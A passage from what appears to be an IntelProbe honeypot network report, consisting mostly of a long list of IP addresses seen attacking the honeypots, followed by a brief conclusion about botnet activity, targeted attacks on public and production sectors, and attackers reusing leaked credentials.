122.117.236.252 122.117.242.173 122.117.249.149 122.117.253.138 122.117.31.203 122.117.33.142 122.117.65.6 122.117.73.248 122.117.80.112 122.117.86.103 122.117.86.84 122.118.131.201 122.118.209.89 122.121.54.248



122.121.81.214 122.128.168.10 122.154.241.159 122.252.72.2 122.254.26.116 122.254.26.21 122.254.4.204 123.0.228.226 123.10.150.135 123.10.27.229 123.109.212.197 123.110.148.253 123.110.180.57 123.110.188.248 123.110.33.239 123.11.0.62 123.11.13.198 123.11.15.137 123.11.203.43 123.12.5.57 123.12.8.145 123.150.45.126 123.181.121.230 123.181.58.32 123.193.214.158 123.194.142.181 123.195.224.67 123.195.84.110 123.201.108.58 123.201.192.84 123.204.47.148 123.205.177.181 123.215.123.223 123.215.156.67 123.23.30.86 123.241.197.245 123.241.27.251 123.241.54.175 123.248.120.5 123.24.94.210 123.4.244.18 123.4.85.161 123.8.175.175 123.8.49.114 123.8.51.70 123.9.42.171 123.9.83.241 124.199.105.51 124.218.134.173 124.244.249.17 124.6.0.253 124.6.16.68 124.89.167.148 125.133.13.201 125.139.102.236 125.139.151.129 125.139.172.240 125.139.203.59 125.139.34.232 125.143.154.139 125.224.102.172 125.224.14.92 125.224.160.78 125.224.17.134 125.224.205.186 125.227.89.11 125.227.89.141 125.227.99.117 125.230.242.56 125.231.131.186 125.231.141.53 125.231.16.201 125.231.36.35 125.231.4.111 125.231.62.99 125.231.64.246 125.43.124.1 125.62.194.202 1.29.179.140 130.204.47.199 131.0.4.48 131.196.146.19 1.34.183.184 1.34.208.206 1.34.221.169 1.34.62.160 1.34.96.144 135.23.228.145 1.36.192.140 1.36.230.46 1.36.244.197 1.36.247.20 1.36.249.166 1.36.251.139 13.66.205.14 1.36.70.85 138.117.163.130 138.186.221.232 138.94.190.193 139.214.61.185 139.5.228.119 141.101.22.254 14.136.7.138 14.172.24.182 14.192.0.67 14.204.229.189 14.234.222.179 14.240.17.74 14.247.100.84 14.252.57.21 14.34.32.193 14.42.160.184 14.43.199.136 14.45.59.244 14.52.106.157 14.53.191.139 14.54.121.93 14.55.127.236 146.196.121.135 146.196.121.153 146.247.146.197 146.247.159.125 149.129.223.58 14.96.109.77 150.107.188.42 150.107.210.27 151.177.129.106 151.177.161.217 151.97.160.8 153.101.245.193 153.125.52.248 1.53.207.94 1.53.221.19 153.3.127.152 153.37.6.134 1.53.99.90 154.123.168.73 154.123.241.241 154.127.151.30 1.54.69.219 1.54.71.51 154.72.77.43 1.54.88.112 1.55.239.68 155.4.94.159 158.174.137.99 158.58.240.252 159.224.112.227 162.252.114.70 163.27.206.111 163.47.143.234 1.64.114.160 1.64.159.80 164.163.224.133 1.64.189.213 1.64.219.61 1.64.234.198 1.64.30.166 1.65.135.158 168.70.114.71 168.70.32.127 168.70.33.243 168.70.46.21 168.70.83.84 168.70.95.159 169.0.108.17 170.81.236.192 170.81.80.50 170.84.69.2 171.101.19.95 171.112.184.241 171.224.31.213


171.226.132.218 171.226.185.8 171.229.187.141 171.229.96.32 171.232.90.24 171.233.17.187 171.235.66.252 171.235.96.127 171.236.245.0 171.239.3.82 171.242.153.80 171.242.155.44 171.242.157.121 171.242.196.69 171.250.245.210 171.252.244.142 171.253.115.161 171.38.147.46 171.38.148.250 171.38.150.172 171.38.194.31 171.38.194.9 171.38.219.20 171.38.221.65 171.38.223.234 171.44.234.166 175.100.20.14 175.123.135.199 175.124.88.212 175.127.11.208 175.144.244.212 175.180.135.248 175.182.135.230 175.182.71.79 175.193.238.79 175.194.243.15 175.197.28.72 175.202.32.80 175.203.171.252 175.205.134.235 175.206.180.82 175.211.62.37 175.215.107.69 175.9.38.86 176.100.77.21 176.101.206.202 176.103.205.138 176.104.183.242 176.104.183.243 176.104.183.251 176.104.183.252 176.192.110.218 176.212.96.16 176.212.96.3 176.212.96.34 176.250.174.157 176.93.78.220 176.99.103.125 176.99.198.248 176.99.243.161 177.101.52.43 177.107.70.140 177.107.70.221 177.128.17.24 177.131.202.152 177.134.117.92 177.155.36.254 177.183.30.31 177.183.64.132 177.23.184.249 177.37.81.138 177.41.37.60 177.53.6.201 177.54.178.173 177.84.223.132 177.97.215.160 178.141.175.155 178.151.83.166 178.165.73.143 178.167.5.58 178.169.247.250 178.173.145.185 178.174.146.179 178.174.146.215 178.176.194.96 178.210.43.102 178.251.107.199 178.44.126.163 179.156.225.176 179.162.191.118 179.187.138.152 179.26.31.88 179.49.71.250 179.49.71.254 180.116.216.145 180.176.148.109 180.176.163.231 180.176.179.130 180.176.182.169 180.177.243.58 180.218.104.113 180.218.122.221 180.94.170.248 181.143.159.242 181.192.28.120 181.39.134.253 181.67.97.77 182.101.35.168 182.110.154.71 182.112.10.44 182.112.2.21 182.113.215.114 182.113.215.50 182.113.219.148 182.116.85.100 182.117.24.173 182.117.30.250 182.117.80.180 182.120.54.236 182.121.225.145 182.122.115.176 182.122.156.151 182.127.107.101 182.127.120.141 182.127.38.107 182.155.147.202 182.155.199.177 182.155.214.51 182.155.98.76 182.156.108.119 182.19.180.83 182.210.211.34 182.221.165.146 182.237.175.209 182.243.40.101 182.55.173.106 182.74.191.84 182.90.175.205 183.101.153.243 183.104.39.247 183.105.225.59 183.105.57.149 183.107.55.178 183.108.165.57 183.108.190.164 183.108.60.167 183.116.126.117 183.154.31.213 183.166.98.123 183.234.137.229 183.239.32.246 183.81.123.113 183.82.145.34 183.82.248.123 183.82.248.16 183.82.36.85 183.82.5.193 183.82.61.179 183.83.52.224 183.97.167.228 183.97.8.209 183.99.129.199 184.153.112.44 185.12.252.191 185.17.90.139 185.20.174.180 185.233.26.11 185.233.26.153 185.46.223.193 186.220.176.8 186.251.182.198 186.5.36.99



186.64.111.73 186.83.41.175 187.134.44.0 187.1.88.38 187.216.253.56 187.32.111.41 187.59.184.118 187.59.190.13 187.87.247.63 187.94.210.37 188.112.148.163 188.115.129.36 188.148.10.157 188.148.179.88 188.148.185.154 188.148.234.16 188.161.231.77 188.181.71.88 188.190.69.192 188.191.29.27 188.210.224.32 188.234.134.42 188.242.240.56 188.242.88.126 188.243.165.222 189.136.128.1 189.136.140.189 189.26.198.237 189.29.211.61 189.41.182.114 189.51.115.173 190.104.246.235 190.104.32.122 190.108.127.52 190.15.211.179 190.7.113.46 190.7.154.42 190.80.97.224 190.85.212.229 190.88.220.195 190.88.242.38 191.240.206.38 191.35.28.239 191.6.81.37 192.165.195.50 193.110.73.91 193.238.135.10 194.186.13.78 194.9.232.30 195.133.207.25 195.19.217.36 195.208.14.74 195.28.3.20 195.67.216.129 196.202.16.244 196.202.90.229 197.159.128.98 197.159.134.166 197.50.32.205 200.127.68.212 200.225.123.38 200.74.105.225 200.75.227.156 201.158.22.246 201.46.33.30 202.134.188.225 202.168.78.104 202.179.88.38 202.186.252.99 202.187.252.139 202.88.235.196 203.196.52.122 203.217.110.26 203.218.101.116 203.218.159.212 203.218.184.35 203.218.245.184 203.218.66.208 203.218.93.160 203.222.1.170 203.222.17.30 203.255.153.99 203.72.198.78 206.132.60.233 206.74.137.210 210.13.90.205 210.18.174.129 210.209.179.162 210.209.211.74 210.61.41.218 210.64.59.8 210.79.196.149 210.99.33.151 211.105.191.248 211.118.132.9 211.183.224.225 211.185.111.56 211.195.197.134 211.196.203.235 211.20.224.216 211.206.20.8 211.21.120.158 211.21.191.38 211.219.150.195 211.219.197.37 211.22.165.58 211.228.39.154 211.230.123.75 211.244.114.146 211.248.17.76 211.248.48.89 211.75.191.221 211.76.72.73 212.225.200.221 212.50.51.6 213.112.34.77 213.112.38.34 213.112.73.133 213.25.46.19 217.172.126.99 217.209.167.167 217.210.113.186 217.210.184.163 217.211.149.4 217.215.167.210 217.26.173.42 218.102.198.99 218.102.76.23 218.102.87.35 218.103.179.191 218.103.195.3 218.144.107.21 218.146.248.91 218.148.229.99 218.159.169.3 218.161.0.123 218.161.112.43 218.161.123.11 218.161.16.201 218.161.56.136 218.161.74.128 218.161.86.188 218.164.5.2 218.164.71.10 218.166.19.58 218.173.55.29 218.173.66.170 218.191.186.224 218.191.190.224 218.210.35.49 218.250.140.5 218.250.161.127 218.250.180.177 218.250.220.83 218.250.255.17 218.250.70.105 218.250.85.46 218.250.99.31 218.32.118.21 218.35.168.69 218.35.40.43 218.35.54.130 218.35.57.16 218.52.124.60 218.55.235.103 218.86.199.24 218.91.97.187 219.155.231.121 219.155.231.213 219.156.191.175 219.73.110.80 219.73.26.57



219.77.113.121 219.77.165.246 219.77.236.10 219.77.33.89 219.77.40.188 219.77.42.16 219.77.62.69 219.77.74.220 219.77.93.144 219.77.98.125 219.78.102.29 219.78.130.38 219.78.16.109 219.78.17.216 219.78.207.65 219.78.219.68 219.78.254.61 219.78.33.72 219.78.64.167 219.78.64.42 219.78.95.193 219.79.10.235 219.79.11.181 219.79.123.228 219.79.175.134 219.79.177.105 219.79.182.182 219.79.202.142 219.79.203.82 219.79.236.174 219.79.244.75 219.79.244.85 219.79.71.249 219.85.102.99 219.85.133.227 219.85.136.190 220.124.128.5 220.124.49.151 220.124.89.21 220.128.142.245 220.129.234.117 220.130.170.75 220.132.102.159 220.132.106.146 220.132.120.230 220.132.120.250 220.132.134.234 220.132.141.138 220.132.149.102 220.132.174.106 220.132.205.9 220.132.211.205 220.132.223.51 220.132.235.162 220.132.237.235 220.132.238.154 220.132.24.244 220.132.24.253 220.132.4.174 220.132.4.233 220.132.50.137 220.132.7.74 220.132.94.232 220.133.107.168 220.133.107.180 220.133.116.99 220.133.119.65 220.133.146.164 220.133.162.178 220.133.170.62 220.133.202.165 220.133.203.210 220.133.217.149 220.133.249.245 220.133.25.128 220.133.40.41 220.133.48.93 220.133.57.67 220.133.90.210 220.133.93.134 220.134.105.249 220.134.116.42 220.134.117.116 220.134.124.51 220.134.127.218 220.134.129.218 220.134.167.5 220.134.189.54 220.134.199.129 220.134.203.62 220.134.206.223 220.134.214.195 220.134.223.127 220.134.227.100 220.134.24.17 220.134.250.55 220.134.53.180 220.134.56.12 220.134.67.202 220.134.71.153 220.134.77.54 220.134.86.47 220.135.201.183 220.135.20.228 220.135.227.159 220.135.43.6 220.135.87.5 220.141.96.101 220.142.169.6 220.142.19.110 220.142.195.167 220.142.41.139 220.142.49.71 220.143.32.19 220.246.151.48 220.246.191.178 220.71.165.250 220.72.84.135 220.77.173.186 220.80.9.225 220.81.5.177 220.82.102.119 220.90.168.237 220.90.89.206 220.94.12.47 221.127.10.77 221.127.115.240 221.127.125.221 221.127.41.132 221.14.122.198 221.146.183.15 221.146.68.62 221.15.102.54 221.153.218.144 221.15.6.7 221.15.7.181 221.157.208.119 221.157.6.232 221.208.136.165 221.208.204.243 221.8.193.176 222.101.187.40 222.105.203.161 222.108.77.165 222.114.195.251 222.120.173.52 222.121.68.200 222.134.5.135 222.139.195.80 222.139.205.178 222.140.113.182 222.141.131.222 222.142.203.219 222.142.204.211 222.142.212.87 222.153.121.128 222.212.84.222 222.236.151.95 222.98.223.130 223.10.161.215 223.10.175.120 223.16.148.71 223.16.212.203 223.16.212.35 223.17.141.230 223.17.167.184 223.17.42.233 223.17.82.238 223.18.106.133 223.18.107.187 223.18.123.207 223.18.218.128



223.18.226.196 223.18.252.154 223.18.255.140 223.19.24.210 223.200.45.20 223.212.39.11 223.215.171.107 23.17.234.125 23.233.126.177 23.24.191.137 24.168.68.204 24.188.5.96 24.207.31.129 24.36.155.190 24.51.104.187 24.72.15.149 24.91.185.17 27.106.103.253 27.109.172.229 27.145.32.68 27.2.159.4 27.218.208.120 27.2.89.202 27.2.93.100 27.2.98.32 27.35.216.150 27.44.70.219 27.54.45.184 27.64.25.253 27.64.40.175 27.68.19.85 27.68.74.201 27.75.100.113 27.75.149.47 27.75.186.187 27.75.22.76 27.77.192.169 27.78.77.180 31.168.72.138 31.208.16.158 31.28.108.175 31.45.16.34 34.215.202.99 35.160.14.100 35.180.133.102 36.153.32.58 36.224.192.71 36.224.204.168 36.224.211.157 36.224.222.214 36.224.229.220 36.224.231.131 36.224.83.110 36.224.96.5 36.226.116.16 36.226.130.58 36.226.220.72 36.227.127.245 36.227.84.73 36.228.212.170 36.229.147.131 36.229.162.63 36.229.36.244 36.229.49.123 36.230.166.212 36.230.67.121 36.230.81.191 36.232.66.253 36.232.69.14 36.232.78.248 36.233.39.55 36.233.51.185 36.234.92.137 36.234.96.244 36.235.121.44 36.235.153.127 36.235.162.72 36.236.109.115 36.236.12.187 36.236.139.87 36.236.19.56 36.236.9.181 36.237.111.118 36.237.211.13 36.237.24.2 36.237.36.12 36.237.7.141 36.238.152.101 36.238.201.47 36.238.37.90 36.238.53.39 36.238.65.184 36.238.66.127 36.238.68.19 36.238.97.252 36.238.98.217 36.239.123.106 36.239.72.202 36.33.248.154 36.35.75.141 36.39.225.61 36.39.72.221 36.66.68.61 37.112.49.241 37.113.195.146 37.193.114.114 37.217.210.226 37.224.76.153 37.53.202.59 37.57.170.70 39.117.186.196 39.118.185.240 39.65.3.49 39.77.34.159 41.222.235.210 42.113.131.213 42.113.30.185 42.115.165.112 42.117.233.0 42.117.29.5 42.118.104.24 42.118.218.221 42.118.47.228 42.118.87.187 42.119.132.29 42.119.183.127 42.119.230.232 42.119.37.83 42.2.118.25 42.2.121.49 42.2.14.169 42.2.169.82 42.2.182.95 42.2.194.129 42.2.203.46 42.2.22.107 42.225.193.145 42.225.201.9 42.225.205.226 42.225.231.78 42.226.71.150 42.227.163.66 42.227.187.95 42.227.197.168 42.229.243.86 42.230.149.226 42.231.123.55 42.231.191.60 42.231.203.10 42.235.182.51 42.2.35.221 42.235.54.21 42.237.25.231 42.237.7.234 42.239.153.177 42.239.238.246 42.2.69.121 42.3.139.235 42.98.108.180 42.98.110.249 42.98.119.191 42.98.124.88 42.98.149.183 42.98.179.244 42.98.214.38 42.98.218.106 42.98.99.86 43.224.131.25 43.252.195.11 45.124.48.6 45.125.62.174 45.162.97.235



45.167.66.59 45.170.174.166 45.170.174.172 45.170.174.190 45.170.174.250 45.173.232.135 45.179.169.104 45.228.253.200 45.238.208.3 45.44.132.83 45.44.49.238 46.102.69.246 46.109.197.231 46.109.74.186 46.1.181.135 46.119.30.251 46.162.106.77 46.16.231.91 46.171.225.221 46.173.4.36 46.185.21.22 46.185.78.101 46.201.98.165 46.233.29.47 46.33.230.214 46.73.117.235 46.73.124.227 47.17.7.166 47.41.49.211 49.113.247.180 49.158.0.60 49.158.184.180 49.158.24.113 49.161.178.31 49.193.41.186 49.206.22.140 49.206.28.208 49.206.29.174 49.206.30.33 49.207.178.155 49.207.3.119 49.213.163.213 49.213.179.151 49.213.186.15 49.213.187.66 49.213.192.173 49.213.194.105 49.213.195.173 49.213.201.142 49.213.201.240 49.213.204.131 49.213.204.186 49.213.240.6 49.89.195.130 5.128.68.166 5.14.158.232 5.165.82.26 5.165.84.74 5.172.149.124 52.124.126.108 52.177.197.181 52.179.156.65 52.183.76.28 52.183.99.55 52.237.143.241 52.34.137.97 5.248.63.129 54.212.124.24 5.42.87.245 5.42.96.196 58.121.76.36 58.122.32.115 58.126.94.203 58.127.9.254 58.146.98.13 58.152.147.221 58.152.156.126 58.152.175.124 58.152.248.109 58.153.106.237 58.153.114.209 58.153.12.48 58.153.195.224 58.153.20.129 58.153.202.43 58.153.23.209 58.153.243.5 58.153.79.2 58.176.235.227 58.212.110.215 58.226.104.231 58.227.118.59 58.239.143.212 59.102.220.249 59.115.127.191 59.115.227.218 59.115.238.94 59.1.165.160 59.120.240.30 59.125.186.203 59.125.219.88 59.125.6.47 59.125.65.93 59.126.113.249 59.126.123.192 59.126.126.179 59.126.129.48 59.126.130.168 59.126.136.149 59.126.150.234 59.126.154.1 59.126.180.162 59.126.181.174 59.126.18.119 59.126.219.127 59.126.224.228 59.126.247.165 59.126.26.194 59.126.36.78 59.126.54.170 59.126.55.10 59.126.80.113 59.126.88.142 59.127.15.23 59.127.159.26 59.127.160.61 59.127.183.81 59.127.21.217 59.127.219.234 59.127.221.14 59.127.236.164 59.127.237.77 59.127.24.201 59.127.36.134 59.127.65.224 59.15.203.101 59.16.113.158 59.17.178.164 59.175.60.151 59.24.202.215 59.52.105.58 59.6.137.47 59.8.125.107 60.13.48.168 60.174.79.239 60.174.95.147 60.174.95.244 60.183.141.66 60.22.199.5 60.244.153.44 60.246.163.161 60.248.111.243 60.248.242.17 60.248.246.4 60.249.208.164 60.249.253.179 60.249.37.188 60.249.87.144 60.250.102.233 60.250.144.90 60.250.196.138 60.250.215.135 60.250.48.221 60.250.55.6 60.251.220.140 61.102.164.22 61.102.164.30 61.168.46.153 61.168.47.191 61.216.147.180 61.216.184.139 61.219.157.153

IntelProbe ® | www.intelprobe.com.tr |HoneyPot Network Report | 23



61.223.107.50 61.223.129.244 61.223.141.120 61.223.145.217 61.223.148.47 61.223.155.140 61.223.236.209 61.227.185.215 61.227.235.239 61.227.33.52 61.228.191.103 61.230.23.121 61.230.44.32 61.247.188.82 61.3.16.210 61.57.72.56 61.58.184.60 61.58.67.60 61.73.8.151 61.77.131.203 61.80.242.108 61.80.66.71 61.83.160.105 61.84.247.221 61.84.82.56 61.93.109.54 61.93.172.148 61.94.149.62 62.148.150.183 62.15.161.203 62.176.11.190 62.204.15.105 62.219.57.147 62.76.20.162 62.85.49.54 64.110.92.13 67.172.72.74 67.216.98.244 67.22.74.226 68.106.103.123 69.206.241.161 70.178.67.173 70.37.85.177 70.37.88.252 71.196.42.222 71.28.125.160 71.66.22.194 71.72.54.124 73.234.49.19 73.42.62.181 73.84.178.42 75.168.140.5 75.191.133.100 76.111.205.202 77.106.106.191 77.109.188.159 77.109.49.115 77.234.20.90 77.70.80.234 77.85.62.96 78.108.19.227 78.111.17.111 78.157.244.191 78.159.60.104 78.186.159.200 78.187.228.99 78.188.135.3 78.188.16.6 78.188.235.38 78.189.172.203 78.192.186.135 78.205.180.36 78.63.77.91 79.100.141.218 79.114.252.100 79.136.87.152 79.138.51.128 79.173.87.97 79.191.66.147 79.73.150.101 80.174.115.76 80.76.185.37 81.16.11.26 81.164.81.19 81.165.250.3 81.170.203.182 81.17.88.1 81.198.9.150 81.22.132.99 81.225.185.222 81.226.131.93 81.237.107.254 82.151.124.181 82.193.153.69 82.196.105.226 82.196.105.87 82.81.213.143 83.130.52.81 83.146.113.88 83.198.153.1 83.21.49.24 83.219.209.120 83.226.230.51 83.233.111.207 83.233.13.169 83.233.3.26 83.238.162.12 83.248.179.127 83.249.218.185 83.250.10.81 83.252.11.143 83.252.11.216 83.252.11.57 83.69.16.222 84.17.1.185 84.216.174.219 84.219.157.37 84.219.204.161 84.40.122.204 85.13.101.172 85.224.210.21 85.226.254.111 85.226.36.144 85.228.129.166 85.228.158.47 85.230.131.170 85.230.169.115 85.245.174.94 85.8.17.30 85.97.198.165 85.97.205.70 86.123.150.225 86.241.151.4 87.110.129.163 87.247.97.189 87.251.172.77 87.27.172.202 87.96.130.99 87.96.186.30 88.129.164.26 88.135.48.78 88.144.255.41 88.201.193.167 88.223.148.158 88.247.136.146 88.247.160.101 88.248.141.206 88.248.96.27 88.89.186.59 89.160.9.22 89.208.30.63 89.208.30.91 89.2.109.180 89.233.197.219 89.240.97.156 89.28.114.102 89.36.151.254 89.47.206.17 90.142.51.185 90.154.172.68 90.225.33.162 90.226.35.178 91.103.214.238 91.105.121.78 91.126.198.27 91.126.201.187 91.126.202.71 91.126.204.11 91.126.238.164 91.126.44.232 91.126.45.95 91.126.46.209





91.126.46.236 91.193.173.2 91.202.132.169 91.206.154.161 91.206.154.179 91.206.154.74 91.210.159.143 91.218.137.86 91.225.8.31 91.228.8.137 91.246.215.153 92.109.244.162 92.113.212.177 92.130.15.184 92.14.120.135 92.34.52.199 92.85.70.197 93.100.50.178 93.108.81.146 93.118.249.12 93.170.23.50 93.182.160.182 93.183.175.64 93.41.206.144 93.76.182.155 93.77.89.228 93.78.217.222 93.79.100.118 94.154.16.234 94.178.190.51 94.178.195.150 94.180.27.176 94.236.239.81 94.52.67.61 95.107.125.145 95.202.36.150 95.221.13.183 95.239.180.27 95.34.160.125 95.68.55.219 95.68.84.103 95.86.41.31 97.77.146.231 98.128.130.211



Conclusion

As a result of examining and analyzing the attacks on the IntelProbe Honeypot Network, it shows that many attacks continue simultaneously through botnets. In addition, it was observed that the attacks on the public and production sectors are target-oriented and the individuals or groups who carry out these attacks attach importance to privacy.

Compared to the open source intelligence platforms, the information obtained with the IntelProbe Honeypot Network has been found to be on the IntelProbe Honeypot Network and is not seen on other platforms.

It was seen that important information such as username and password leaked by the institutions were used by the attackers and this information was tried on HoneyPots.




Security Intelligence Center Orchestration

“Discover beneath the tip of the iceberg.”[email protected]

IntelProbe HoneyPot Rapor ENG - ecs-org.eu€¦ · HoneyPot Network Report About Us IntelProbe is a Turkish company specialized in the areas of next generation defense technologies,

Documents